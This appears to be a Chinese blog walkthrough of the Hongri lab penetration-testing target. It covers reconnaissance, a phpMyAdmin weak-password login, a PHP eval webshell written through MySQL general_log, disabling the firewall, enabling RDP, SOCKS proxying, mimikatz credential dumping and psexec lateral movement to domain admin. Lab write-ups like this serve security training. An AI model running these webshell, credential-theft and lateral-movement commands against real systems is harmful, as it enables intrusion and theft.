红日打靶(1)
Published in:2025-11-15 | category: 靶机 内网渗透

0x01 信息收集

靶机IP:192.168.242.245

先查端口

1
nmap -sS -sV -O -p- 192.168.242.245 -T4 --min-rate 1000

发现几个关键端口,开放 80的 web 端口, 65534 ssh 和 445 带有工作组的端口,优先看看 80

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Nmap scan report for 192.168.242.245
Host is up (0.020s latency).
Not shown: 65523 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: GOD)
1025/tcp  open  msrpc        Microsoft Windows RPC
1026/tcp  open  msrpc        Microsoft Windows RPC
1027/tcp  open  msrpc        Microsoft Windows RPC
1028/tcp  open  msrpc        Microsoft Windows RPC
1029/tcp  open  msrpc        Microsoft Windows RPC
1030/tcp  open  msrpc        Microsoft Windows RPC
3306/tcp  open  mysql        MySQL (unauthorized)
65534/tcp open  ssh          (protocol 2.0)
Device type: firewall
Running (JUST GUESSING): Fortinet embedded (88%)
OS CPE: cpe:/h:fortinet:fortigate_200b
Aggressive OS guesses: Fortinet FortiGate 200B firewall (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: -7 hops
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.37 seconds

用 dirsearch 扫描一下 web 的目录

1
dirsearch -u http://192.168.242.245/ -i 200

扫出有phpMyAdmin

1
2
3
4
5
6
7
8
9
10
[05:53:08] Starting: 
[05:55:01] 200 -   79KB - /phpinfo.php                                      
[05:55:04] 200 -   32KB - /phpmyadmin/ChangeLog                             
[05:55:04] 200 -    2KB - /phpmyadmin/README                                
[05:55:07] 200 -    4KB - /phpMyAdmin/                                      
[05:55:07] 200 -    4KB - /phpmyadmin/                                      
[05:55:07] 200 -    4KB - /phpMyadmin/
[05:55:07] 200 -    4KB - /phpmyAdmin/                                      
[05:55:07] 200 -    4KB - /phpMyAdmin/index.php
[05:55:07] 200 -    4KB - /phpmyadmin/index.php

0x02漏洞利用

通过弱口令尝试 root/root 进来了,第一时间想到 phpMyAdmin 写 shell

先查一下有没有开启 secure_file_priv

1
SHOW VARIABLES LIKE 'secure_file_priv';

发现禁止写入,只有 secure_file_priv 为空字符串才可以任意写入

转变思路,开启 mysql 日志查询,访问日志获得 shell,这里我们在80 页面的 phpinfo 探针获得了绝对路径C:/phpstudy_pro/WWW

1
2
3
4
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = 'C:/phpstudy_pro/WWW/shell.php';
SELECT '<?php eval($_POST["cmd"]); ?>';
SET GLOBAL general_log = 'OFF';

用蚁剑访问 http://192.168.242.245/shell.php 可以拿到 shell

翻目录翻到了一堆 ssh 相关密钥其实没啥用,确定是一台 windows 电脑,所以侧重点还是考虑开 3389 rdp 操作,并且 whoami 可以看到是 system 命令

0x03进入内网

先关闭防火墙

1
netsh advfirewall set allprofiles state off

用了这个工具强行开启 3389

https://github.com/sobinge/shadow2/blob/master/%E6%8F%90%E6%9D%83%E5%88%A9%E5%99%A8/%E5%BC%803389%E7%AB%AF%E5%8F%A3%EF%BC%88%E7%A5%9E%E5%99%A8%EF%BC%89/kai3389.exe

也可以使用下面的命令

1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

然后连进去

使用 ipconfig /all,发现这台主机的另一个网卡地址,并确定另外一个网段 192.168.52.0/24

net localgroup administrators,查看本地管理员组

SSH 转发端口到内网网段

ssh -D 1080 Administrator@192.168.242.245 -p 65534 -N -f

流量代理用的是proxychains4,修改相关文件

1
vim /etc/proxychains4.conf

将最后的 tor 网络监听注释掉,并追加一行 

1
socks5 127.0.0.1:1080

测试一下能否正常,发现是可以访问的

1
proxychain4 curl -I http://192.168.52.141

使用内网主机发现,这里因为太慢了,看了下配置文件,在/etc/proxychains4.conf 文件里面默认设置超时时间太长了

1
2
tcp_read_time_out 15000
tcp_connect_time_out 8000

因为是靶机,改成 500 和 1000,就快一点

1
proxychains4 -f /tmp/fast_proxy.conf nmap -sT -Pn -p 445,80,22 192.168.52.0/24

这里有个小坑,使用 proxychains 用这个命令会显示全部 hosts up,如果单纯在 nmap 是可以扫出来的

1
proxychains4 nmap -sn -PR -n 192.168.52.143/24

查了资料说是本地调用是走 arp 协议的,而arp 属于二层,proxychains4 走第四层协议,数据包无法通过代理,最后发现是有 2 个主机,192.168.52.138,192.168.52.141,并且都开启了 445 端口,尝试下走 SMB

并且在之前的搜索中知道域 god.org

0x04横向移动

用 mimikatz 抓取域内的用户凭证

1
2
privilege::debug
sekurlsa::logonpasswords

1
2
3
4
5
6
proxychains4 psexec \\192.168.52.138 -u administrator -p hongrisec@2025 cmd.exe
proxychains4 winexe -U administrator%hongrisec@2025 //192.168.52.138 "cmd.exe /c chcp 65001 && cmd.exe"
# 这里是系统乱码,chcp 65001 是UTF-8
chcp 65001    # UTF-8
chcp 437      # 英文 (美国)
chcp 936      # 中文 (简体)

拿到域控管理员权限

0x05总结

该靶场有多种外网漏洞利用方式,其中一种是这个日志查询写webshell,还有其他的,字典足够大的情况下能扫描到beifen.rar文件,里面是网站的源代码,查看到一个yxcms文件夹,可以得知是一个cms平台,访问IP+文件夹名进入网站,有文件上传漏洞

Next:
WireGuard接入家庭主机记录
catalog
catalog
    •

    Copyright © 2022 - 2025 wh1t3zer | Powered by Hexo | Theme Bamboo

    Total visits: times |